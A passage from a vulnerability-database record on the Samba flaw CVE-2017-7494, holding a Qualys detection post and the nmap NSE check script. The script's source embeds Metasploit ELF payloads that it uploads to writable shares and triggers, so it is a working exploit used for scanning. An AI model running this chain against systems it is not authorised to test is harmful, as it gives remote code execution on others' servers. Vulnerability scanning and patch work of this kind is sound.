"cpe:2.3:a:samba:samba:4.2.12:*:*:*:*:*:*:*", 
"cpe:2.3:a:samba:samba:4.0.19:*:*:*:*:*:*:*"]}], "qualysblog": [{"lastseen": "2017-06-10T11:14:54", "bulletinFamily": "blog", "cvelist": ["CVE-2017-7494"], "description": "On Wednesday, the Samba Team patched a [vulnerability](<https://www.samba.org/samba/security/CVE-2017-7494.html>) that exists in all versions of Samba including and after version 3.5.0. Exploitation of this vulnerability could result in remote code execution on the affected host.\n\nSamba is used to provide SMB and CIFS services for Linux systems, and is pervasive in both enterprise and consumer products. While the Samba Team is providing patches for the latest versions (4.4.x and higher), some Linux vendors, such as [RedHat](<https://access.redhat.com/security/cve/cve-2017-7494>) and [Ubuntu](<https://www.ubuntu.com/usn/usn-3296-1/>), are providing patches for older versions of Samba if they are used in a supported version of the OS. The Samba Team may also release [patches for older versions of Samba](<http://samba.org/samba/patches/>).\n\n### Background\n\n\n\nQuestions have been raised on whether this vulnerability could pose the same risk as WannaCry, and this vulnerability does bear some similarities, but there are some key differences. Similar to the vulnerability exploited by WannaCry, this exploit targets SMB, albeit a different implementation of the protocol. It also carries the threat of being \"wormable,\" i.e. malware can leverage it to spread automatically from system to system.\n\nHowever, this vulnerability remains much more difficult to exploit, because it requires not only outdated software but also a specific configuration, such as anonymous write access to a share. 
Still, examples like this Samba vulnerability only continue to reinforce the ongoing need for continuous security visibility to prioritize patching and system configuration updates and for full data backups of critical files to ensure business resiliency.\n\n### Detecting CVE-2017-7494\n\nQualys has provided several QIDs for detecting this vulnerability using [Qualys Vulnerability Management](<https://www.qualys.com/suite/vulnerability-management/>), and will continue to add details as vendors release additional patches.\n\n38671 Samba Writable Share Remote Code Execution Vulnerability \n170002 SUSE Enterprise Linux Security Update for samba (SUSE-SU-2017:1391-1) \n170003 SUSE Enterprise Linux Security Update for samba (SUSE-SU-2017:1392-1) \n170004 SUSE Enterprise Linux Security Update for samba (SUSE-SU-2017:1393-1) \n196791 Ubuntu Security Notification for Samba Vulnerability (USN-3296-1) \n236359 Red Hat Update for samba (RHSA-2017-1270) \n236360 Red Hat Update for samba4 (RHSA-2017-1271) \n236361 Red Hat Update for samba3x (RHSA-2017-1272) \n157455 Oracle Enterprise Linux Security Update for samba (ELSA-2017-1270) \n157456 Oracle Enterprise Linux Security Update for samba4 (ELSA-2017-1271) \n176040 Debian Security Update for samba (DSA 3860-1)\n\nQID 38671 offers remote (unauthenticated) detection of the vulnerability by identifying the underlying samba version. The other vendor-specific QIDs require authentication and will identify the vendor-specific patch needed for remediation.\n\n### Workarounds\n\nAccording to the Samba security bulletin, there is a workaround available. You can add the parameter:\n\nnt pipe support = no\n\nto the [global] section of your smb.conf and restart smbd. Please note that the Samba Team has also advised: \"This prevents clients from accessing any named pipe endpoints. 
Note this can disable some expected functionality for Windows clients.\" As with any workarounds, this should be fully tested in your environment before a large-scale deployment is performed.\n\n### Get Started Now\n\nTo start detecting and protecting against critical vulnerabilities, get a [Qualys Suite trial](<https://www.qualys.com/forms/trials/suite/?utm_source=blog&utm_medium=website&utm_campaign=demand-gen&utm_term=apache-struts-q1-2017&utm_content=trial&leadsource=344554007>). All features described in this article are available in the trial.", "modified": "2017-05-26T20:32:57", "published": "2017-05-26T20:32:57", "id": "QUALYSBLOG:D20A6BA20BB0FAD48EDDE6836F08EDBA", "href": "https://blog.qualys.com/securitylabs/2017/05/26/samba-vulnerability-cve-2017-7494", "type": "qualysblog", "title": "Samba Vulnerability CVE-2017-7494", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nmap": [{"lastseen": "2019-05-30T17:05:48", "description": "Checks if target machines are vulnerable to the arbitrary shared library load vulnerability CVE-2017-7494. \n\nUnpatched versions of Samba from 3.5.0 to 4.4.13, and versions prior to 4.5.10 and 4.6.4 are affected by a vulnerability that allows remote code execution, allowing a malicious client to upload a shared library to a writable share, and then cause the server to load and execute it. \n\nThe script does not scan the version numbers by default as the patches released for the mainstream Linux distributions do not change the version numbers. \n\nThe script checks the preconditions for the exploit to happen: \n\n1) If the argument check-version is applied, the script will ONLY check services running potentially vulnerable versions of Samba, and run the exploit against those services. This is useful if you wish to scan a group of hosts quickly for the vulnerability based on the version number. 
However, because of their version number, some patched versions may still show up as likely vulnerable. Here, we use smb.get_os(host) to do versioning of the Samba version and compare it to see if it is a known vulnerable version of Samba. Note that this check is not conclusive: See 2,3,4 \n\n2) Whether there exists writable shares for the execution of the script. We must be able to write to a file to the share for the exploit to take place. We hence enumerate the shares using smb.share_find_writable(host) which returns the main_name, main_path and a list of writable shares. \n\n3) Whether the workaround (disabling of named pipes) was applied. When \"nt pipe support = no\" is configured on the host, the service would not be exploitable. Hence, we check whether this is configured on the host using smb.share_get_details(host, 'IPC$'). The error returned would be \"NT_STATUS_ACCESS_DENIED\" if the workaround is applied. \n\n4) Whether we can invoke the payloads from the shares. Using payloads from Metasploit, we upload the library files to the writable share obtained from 2). We then make a named pipe request using NT_CREATE_ANDX_REQUEST to the actual local filepath and if the payload executes, the status return will be false. Note that only Linux_x86 and Linux_x64 payloads are tested in this script. \n\nThis script is based on the metasploit module written by hdm. \n\nReferences: \n\n * https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/samba/is_known_pipename.rb\n * https://www.samba.org/samba/security/CVE-2017-7494.html\n * http://blog.nsfocus.net/samba-remote-code-execution-vulnerability-analysis/\n\n## Script Arguments \n\n#### smb-vuln-cve-2017-7494.check-version \n\nCheck only the version numbers the target's Samba service. Default: false\n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. 
\n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the smb library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns library. \n\n## Example Usage \n\n * nmap --script smb-vuln-cve-2017-7494 -p 445 <target>\n\n * nmap --script smb-vuln-cve-2017-7494 --script-args smb-vuln-cve-2017-7494.check-version -p445 <target>\n\n## Script Output \n \n \n PORT STATE SERVICE\n 445/tcp open microsoft-ds\n MAC Address: 00:0C:29:16:04:53 (VMware)\n \n | smb-vuln-cve-2017-7494:\n | VULNERABLE:\n | SAMBA Remote Code Execution from Writable Share\n | State: VULNERABLE\n | IDs: CVE:CVE-2017-7494\n | Risk factor: HIGH CVSSv3: 7.5 (HIGH) (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H)\n | All versions of Samba from 3.5.0 onwards are vulnerable to a remote\n | code execution vulnerability, allowing a malicious client to upload a\n | shared library to a writable share, and then cause the server to load\n | and execute it.\n |\n | Disclosure date: 2017-05-24\n | Check results:\n | Samba Version: 4.3.9-Ubuntu\n | Writable share found.\n | Name: \\\\192.168.15.131\\test\n | Exploitation of CVE-2017-7494 succeeded!\n | Extra information:\n | All writable shares:\n | Name: \\\\192.168.15.131\\test\n | References:\n | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7494\n |_ https://www.samba.org/samba/security/CVE-2017-7494.html\n \n\n## Requires \n\n * smb\n * string\n * vulns\n * stdnse\n * table\n * nmap\n\n* * *\n", "edition": 5, "published": "2017-06-10T03:29:33", "title": "smb-vuln-cve-2017-7494 NSE Script", "type": "nmap", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7494"], "modified": "2018-03-26T14:59:41", "href": "https://nmap.org/nsedoc/scripts/smb-vuln-cve-2017-7494.html", "id": "NMAP:SMB-VULN-CVE-2017-7494.NSE", "sourceData": "local smb = require \"smb\"\nlocal string = require \"string\"\nlocal vulns = require \"vulns\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\nlocal nmap = require 
\"nmap\"\n\ndescription = [[\nChecks if target machines are vulnerable to the arbitrary shared library load\nvulnerability CVE-2017-7494.\n\nUnpatched versions of Samba from 3.5.0 to 4.4.13, and versions prior to\n4.5.10 and 4.6.4 are affected by a vulnerability that allows remote code\nexecution, allowing a malicious client to upload a shared library to a writable\nshare, and then cause the server to load and execute it.\n\nThe script does not scan the version numbers by default as the patches released\nfor the mainstream Linux distributions do not change the version numbers.\n\nThe script checks the preconditions for the exploit to happen:\n\n1) If the argument check-version is applied, the script will ONLY check\n services running potentially vulnerable versions of Samba, and run the\n exploit against those services. This is useful if you wish to scan a\n group of hosts quickly for the vulnerability based on the version number.\n However, because of their version number, some patched versions may still\n show up as likely vulnerable. Here, we use smb.get_os(host) to do\n versioning of the Samba version and compare it to see if it is a known\n vulnerable version of Samba. Note that this check is not conclusive:\n See 2,3,4\n\n2) Whether there exists writable shares for the execution of the script.\n We must be able to write to a file to the share for the exploit to\n take place. We hence enumerate the shares using\n smb.share_find_writable(host) which returns the main_name, main_path\n and a list of writable shares.\n\n3) Whether the workaround (disabling of named pipes) was applied.\n When \"nt pipe support = no\" is configured on the host, the service\n would not be exploitable. Hence, we check whether this is configured\n on the host using smb.share_get_details(host, 'IPC$'). 
The error\n returned would be \"NT_STATUS_ACCESS_DENIED\" if the workaround is\n applied.\n\n4) Whether we can invoke the payloads from the shares.\n Using payloads from Metasploit, we upload the library files to\n the writable share obtained from 2). We then make a named pipe request\n using NT_CREATE_ANDX_REQUEST to the actual local filepath and if the\n payload executes, the status return will be false. Note that only\n Linux_x86 and Linux_x64 payloads are tested in this script.\n\nThis script is based on the metasploit module written by hdm.\n\nReferences:\n* https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/samba/is_known_pipename.rb\n* https://www.samba.org/samba/security/CVE-2017-7494.html\n* http://blog.nsfocus.net/samba-remote-code-execution-vulnerability-analysis/\n]]\n\n---\n-- @usage nmap --script smb-vuln-cve-2017-7494 -p 445 <target>\n-- @usage nmap --script smb-vuln-cve-2017-7494 --script-args smb-vuln-cve-2017-7494.check-version -p445 <target>\n-- @output\n-- PORT STATE SERVICE\n-- 445/tcp open microsoft-ds\n-- MAC Address: 00:0C:29:16:04:53 (VMware)\n--\n-- | smb-vuln-cve-2017-7494:\n-- | VULNERABLE:\n-- | SAMBA Remote Code Execution from Writable Share\n-- | State: VULNERABLE\n-- | IDs: CVE:CVE-2017-7494\n-- | Risk factor: HIGH CVSSv3: 7.5 (HIGH) (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H)\n-- | All versions of Samba from 3.5.0 onwards are vulnerable to a remote\n-- | code execution vulnerability, allowing a malicious client to upload a\n-- | shared library to a writable share, and then cause the server to load\n-- | and execute it.\n-- |\n-- | Disclosure date: 2017-05-24\n-- | Check results:\n-- | Samba Version: 4.3.9-Ubuntu\n-- | Writable share found.\n-- | Name: \\\\192.168.15.131\\test\n-- | Exploitation of CVE-2017-7494 succeeded!\n-- | Extra information:\n-- | All writable shares:\n-- | Name: \\\\192.168.15.131\\test\n-- | References:\n-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7494\n-- |_ 
https://www.samba.org/samba/security/CVE-2017-7494.html\n--\n-- @xmloutput\n-- <table key=\"CVE-2017-7494\">\n-- <elem key=\"title\">SAMBA Remote Code Execution from Writable Share</elem>\n-- <elem key=\"state\">VULNERABLE</elem>\n-- <table key=\"ids\">\n-- <elem>CVE:CVE-2017-7494</elem>\n-- </table>\n-- <table key=\"scores\">\n-- <elem key=\"CVSSv3\">7.5 (HIGH) (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H)</elem>\n-- </table>\n-- <table key=\"description\">\n-- <elem>All versions of Samba from 3.5.0 onwards are vulnerable to a remote
code execution vulnerability, allowing a malicious client to upload a
shared library to a writable share, and then cause the server to load
and execute it.
</elem>\n-- </table>\n-- <table key=\"dates\">\n-- <table key=\"disclosure\">\n-- <elem key=\"year\">2017</elem>\n-- <elem key=\"day\">24</elem>\n-- <elem key=\"month\">05</elem>\n-- </table>\n-- </table>\n-- <elem key=\"disclosure\">2017-05-24</elem>\n-- <table key=\"check_results\">\n-- <elem>Samba Version: 4.3.9-Ubuntu</elem>\n-- <elem>Writable share found. 
 Name: \\\\192.168.15.131\\test</elem>\n-- <elem>Exploitation of CVE-2017-7494 succeeded!</elem>\n-- </table>\n-- <table key=\"extra_info\">\n-- <elem>All writable shares:</elem>\n-- <elem> Name: \\\\192.168.15.131\\test</elem>\n-- </table>\n-- <table key=\"refs\">\n-- <elem>https://www.samba.org/samba/security/CVE-2017-7494.html</elem>\n-- <elem>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7494</elem>\n-- </table>\n-- </table>\n-- @args smb-vuln-cve-2017-7494.check-version Check only the version numbers the target's Samba service. Default: false\n--\n---\n\nauthor = \"Wong Wai Tuck\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"vuln\",\"intrusive\"}\n\nhostrule = function(host)\n return smb.get_port(host) ~= nil\nend\n\ndependencies = {\"smb-os-discovery\", \"smb-brute\"}\n\n--linux/x86/exec (CMD=id)\nlocal PAYLOAD_X86 = {\n0x7F, 0x45, 0x4C, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x03, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0xF6, 0x00, 0x00, 0x00, 0x34, 0x00, 0x00, 0x00,\n0x74, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x02, 0x00, 0x28, 0x00,\n0x02, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x1C, 0x01, 0x00, 0x00, 0x42, 0x01, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,\n0x00, 0x10, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0xC4, 0x00, 0x00, 0x00,\n0xC4, 0x00, 0x00, 0x00, 0xC4, 0x00, 0x00, 0x00, 0x30, 0x00, 0x00, 0x00, 0x30, 0x00, 0x00, 0x00,\n0x00, 0x10, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0xC4, 0x00, 0x00, 0x00, 0xC4, 0x00, 0x00, 0x00, 0x30, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xF4, 0x00, 0x00, 0x00, 0xF4, 0x00, 0x00, 0x00,\n0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x0C, 0x00, 0x00, 0x00, 0xF6, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00,\n0xF4, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0xF4, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x0B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6A, 0x0B, 0x58, 0x99, 0x52, 0x66, 0x68, 0x2D, 0x63, 0x89,\n0xE7, 0x68, 0x2F, 0x73, 0x68, 0x00, 0x68, 0x2F, 0x62, 0x69, 0x6E, 0x89, 0xE3, 0x52, 0xE8, 0x03,\n0x00, 0x00, 0x00, 0x69, 0x64, 0x00, 0x57, 0x53, 0x89, 0xE1, 0xCD, 0x80,\n}\n\n--linux/x64/exec (CMD=id)\nlocal PAYLOAD_X64 = {\n0x7F, 0x45, 0x4C, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x03, 0x00, 0x3E, 0x00, 0x01, 0x00, 0x00, 0x00, 0x92, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xB0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x02, 0x00, 0x40, 0x00, 0x02, 0x00, 0x01, 0x00,\n0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0xBC, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xE6, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,\n0x30, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x30, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x30, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x60, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x01, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x30, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x30, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x60, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00,\n0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x90, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x90, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x0C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x92, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x90, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x90, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x0A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x0B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x6A, 0x3B, 0x58, 0x99, 0x48, 0xBB, 0x2F, 0x62, 0x69, 0x6E, 0x2F, 0x73, 0x68, 0x00,\n0x53, 0x48, 0x89, 0xE7, 0x68, 0x2D, 0x63, 0x00, 0x00, 0x48, 0x89, 0xE6, 0x52, 0xE8, 0x03, 0x00,\n0x00, 0x00, 0x69, 0x64, 0x00, 0x56, 0x57, 0x48, 0x89, 0xE6, 0x0F, 0x05,\n}\n\nPAYLOAD_X86 = string.char(table.unpack(PAYLOAD_X86))\nPAYLOAD_X64 = string.char(table.unpack(PAYLOAD_X64))\n\n-- directories to look through if actual path cannot be queried\nlocal COMMON_DIRS = {\"/volume1/\",\"/volume2/\",\"/volume3/\",\"/volume4/\",\n \"/shared/\",\"/mnt/\",\"/mnt/usb/\",\"/media/\",\"/mnt/media/\",\"/var/samba/\",\n \"/tmp/\",\"/home/\",\"/home/shared/\"}\n\n-- filename used to save into the shared folders\nlocal FILENAME = 'test.so'\n\nlocal payloads = {PAYLOAD_X86, PAYLOAD_X64}\n\n--- Determines whether the version of Samba is vulnerable and sets it in the\n-- table samba_cve. 
Note that version numbers may not indicate vulnerability\n-- as there are patches released (e.g. for Ubuntu) which did not change the\n-- version of Samba\n--\n-- @param version The string containing the version of Samba\n-- @param samba_cve The vuln table containing information for the results\nlocal function determine_vuln_version(version, samba_cve)\n local major, minor, patch\n major, minor, patch = string.match(version,\"(%d+)%.(%d+)%.(%d+).*\")\n stdnse.debug(\"Major version: %s, Minor version: %s, Patch version: %s\", major, minor, patch)\n major, minor, patch = tonumber(major), tonumber(minor), tonumber(patch)\n\n -- no patches available for 3.5.X and 3.6.X\n if major == 3 and minor >= 5 then\n samba_cve.state = vulns.STATE.LIKELY_VULN\n elseif major == 4 then\n if minor < 4 then\n samba_cve.state = vulns.STATE.LIKELY_VULN\n -- patched in 4.4.14\n elseif minor == 4 and patch < 14 then\n samba_cve.state = vulns.STATE.LIKELY_VULN\n -- patched in 4.5.10\n elseif minor == 5 and patch < 10 then\n samba_cve.state = vulns.STATE.LIKELY_VULN\n -- patched in 4.6.4\n elseif minor == 6 and patch < 4 then\n samba_cve.state = vulns.STATE.LIKELY_VULN\n end\n end\nend\n\n--- Finds all writable shares on the target host and stores the name and path\n-- into samba_cve stable, using smb.share_find_writable\n--\n-- @param host The target host\n-- @param samba_cve The vuln table containing information for the results\n-- @return (main_name, main_path) Two strings, containing the name of the main\n-- writable share and its path\nlocal function find_writable_shares(host, samba_cve)\n -- determine if there are writable shares\n local status, main_name, main_path, names\n status, main_name, main_path, names = smb.share_find_writable(host)\n\n -- successful in finding writable share\n if status then\n local msg = string.format(\"Writable share found. \\n Name: %s\", main_name)\n if main_path then\n msg = msg .. 
string.format(\"\\n Path: %s \", main_path)\n end\n\n -- insert main writable directory with path into check_results\n table.insert(samba_cve.check_results, msg)\n\n -- insert names of other writable shares to extra_info\n if #names > 0 then\n table.insert(samba_cve.extra_info, string.format(\n \"All writable shares:\"))\n end\n for i = 1, #names, 1 do\n table.insert(samba_cve.extra_info, string.format(\" Name: %s\", main_name))\n end\n else\n -- writable share enumeration failed, return error message stored in main_name\n local err = main_name\n table.insert(samba_cve.extra_info, err)\n main_name = nil\n end\n\n -- main_path is C:\\<actual share>\n -- we map it to the equivalent statement in Unix filesystems\n -- i.e. /<actual share>/\n if main_path then\n main_path = \"/\" .. string.sub(main_path, 4) .. \"/\"\n end\n\n return main_name, main_path\nend\n\n--- Check if the suggested workaround \"nt pipe support = no\" was applied on\n-- the target host. The script checks if details can be queried on IPC$\n-- which in a typical case will return details on the IPC, but if the\n-- workaround is applied, an error of 'NT_STATUS_ACCESS_DENIED' is returned\n--\n-- @param host The target host\n-- @param samba_cve The vuln table containing information for the results\n-- @return A boolean indicating the nt pipe support is enabled, which\n-- indicates the workaround was not applied\nlocal function is_ntpipesupport_enabled(host, samba_cve)\n -- do \"nt pipe support = no\" workaround check, in which case\n -- accessing 'IPC$' returns 'NT_STATUS_ACCESS_DENIED'\n local status, result\n status, result = smb.share_get_details(host, 'IPC$')\n\n if status and result['details'] == \"NT_STATUS_ACCESS_DENIED\" then\n samba_cve.state = vulns.STATE.NOT_VULN\n return false\n elseif not status then\n -- error accessing IPC$, present error to user\n local err = result\n table.insert(samba_cve.extra_info, err)\n end\n\n return true\nend\n\n--- Creates candidate paths for common directories 
of shares\n-- This is method is based off the Metasploit script.\n--\n-- @param share_name Name of the share that you wish to write to\n-- ireturn Array of candidate paths of the shares, never nil\nlocal function enumerate_directories(share_name)\n local candidates = {}\n\n -- enumerate through all locations to find the file\n for i = 1, #COMMON_DIRS, 1 do\n table.insert(candidates, COMMON_DIRS[i])\n table.insert(candidates, COMMON_DIRS[i] .. share_name)\n table.insert(candidates, COMMON_DIRS[i] .. string.upper(share_name))\n table.insert(candidates, COMMON_DIRS[i] .. string.lower(share_name))\n table.insert(candidates, COMMON_DIRS[i] .. string.gsub(share_name, \" \", \"_\"))\n end\n\n return candidates\nend\n\n--- Uploads the payloads in the array into a file each on the writable share.\n-- Because the execution of the payload must match the architecture of the\n-- target system, the function will try to test against each payload from\n-- different architectures. The payloads were generated from Metasploit.\n--\n-- The function will then test if the system is vulnerable by making a NT\n-- Create AndX Request on the IPC$ on the actual path of the file containing\n-- the payload. It will first try to see if the actual path was retrieved\n-- using previously by checking for the path argument. If it is not supplied,\n-- because we do not know where the actual files are stored on the filesystem,\n-- we have to make guesses on common directories. 
The status returned when\n-- the payload executes is false, indicating that the system is vulnerable.\n--\n-- @param host The target host\n-- @param samba_cve The vuln table containing information for the results\n-- @param payloads An array containing payloads from different architectures\n-- @param name The name of the writable share\n-- @param path The canonical path of the share\nlocal function test_cve2017_7494(host, samba_cve, payloads, name, path)\n local status, result, err, share_name\n local candidates = {}\n\n -- create the files of both payloads on the share\n -- the files are named as follows:\n -- <index><base_filename>\n for i, l_payload in ipairs(payloads) do\n for _, anon in ipairs({true, false}) do\n status, err = smb.file_write(host, l_payload, name,\n tostring(i) .. FILENAME, anon)\n stdnse.debug1(\"Write file status %s , err %s\", status, err)\n if status then break end\n end\n end\n\n -- check if a proper filepath is returned from smb probes and use it\n if path then\n table.insert(candidates, path)\n else\n share_name = string.match(name, \"\\\\\\\\.*\\\\(.*)\") .. '/'\n candidates = enumerate_directories(share_name)\n end\n\n -- try all candidate payloads\n for h = 1, #payloads, 1 do\n local l_filename = tostring(h) .. FILENAME\n -- loop through all common candidate paths\n for i = 1, #candidates, 1 do\n local path = candidates[i] .. l_filename\n local pipe_formats = {\"\\\\\\\\PIPE\\\\\".. path , path}\n -- test both pipe formats for each path\n for j = 1, #pipe_formats, 1 do\n local curr_path = pipe_formats[j]\n -- make an simple SMB connection to IPC$\n local status, smbstate = smb.start_ex(host, true, true, \"\\\\\\\\\" ..\n host.ip .. 
\"\\\\IPC$\", nil, nil, nil)\n if not status then\n stdnse.debug1(\"Could not connect to IPC$\")\n else\n local overrides = {}\n -- perform NT Create NX Request on candidate file paths\n overrides['file_create_disposition'] = 0x1 -- FILE_OPEN\n overrides['file_create_security_flags'] = 0x0 -- No dynamic tracking, no security context\n\n stdnse.debug1(\"Trying path : %s\", curr_path)\n status, result = smb.create_file(smbstate, curr_path, overrides)\n stdnse.debug1(\"Status: %s, Result: %s\", status, result)\n -- on payload execution, result will be false and server will disconnect\n if not status and string.match(result, \"SMB: ERROR: Server disconnected the connection\") then\n samba_cve.state = vulns.STATE.VULN\n table.insert(samba_cve.check_results,\n \"Exploitation of CVE-2017-7494 succeeded!\")\n return\n end\n end\n end\n end\n end\n if samba_cve.state ~= vulns.STATE.VULN and not path then\n samba_cve.state = vulns.STATE.LIKELY_VULN\n table.insert(samba_cve.check_results,\n 'File written to remote share, but unable to execute payload either due to unknown actual path, or the system may be patched.')\n end\nend\n\naction = function(host,port)\n local port = nmap.get_port_state(host,{number=smb.get_port(host),protocol='tcp'})\n\n local result, stats\n local response = {}\n\n local samba_cve = {\n title = \"SAMBA Remote Code Execution from Writable Share\",\n IDS = {CVE = 'CVE-2017-7494'},\n risk_factor = \"HIGH\",\n scores = {\n CVSSv3 = \"7.5 (HIGH) (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H)\"\n },\n description = [[\nAll versions of Samba from 3.5.0 onwards are vulnerable to a remote\ncode execution vulnerability, allowing a malicious client to upload a\nshared library to a writable share, and then cause the server to load\nand execute it.\n]],\n references = {\n 'https://www.samba.org/samba/security/CVE-2017-7494.html',\n },\n dates = {\n disclosure = {year = '2017', month = '05', day = '24'},\n },\n check_results = {},\n extra_info = {}\n }\n\n local 
report = vulns.Report:new(SCRIPT_NAME, host, port)\n samba_cve.state = vulns.STATE.NOT_VULN\n\n local check_version = stdnse.get_script_args(SCRIPT_NAME .. \".check-version\") or false\n -- check if they put false or similar\n if check_version and string.lower(check_version) == \"false\" then\n check_version = nil\n end\n\n local version = port.version.version\n\n -- retrieve version of samba using smb.get_os\n if not version then\n local status, result = smb.get_os(host)\n\n if(status == false) then\n return stdnse.format_output(false, result)\n end\n\n -- result.lanmanager contains OS version information\n -- string returned by result.lanmanager looks like Samba 4.3.9-Ubuntu\n -- we only want 4.3.9-Ubuntu\n if string.match(result.lanmanager,\"^Samba \") then\n version = string.match(result.lanmanager,\"^Samba (.*)\")\n else\n return stdnse.format_output(false,\n \"Either versioning failed or samba does not exist on the port!\")\n end\n end\n\n table.insert(samba_cve.check_results,\n string.format(\"Samba Version: %s\",version))\n\n if check_version then\n stdnse.debug(\"Port Version: %s\", port.version.version)\n -- determine if version is vulnerable\n determine_vuln_version(version, samba_cve)\n\n -- The first set of conditions sees if version checking is specified\n -- 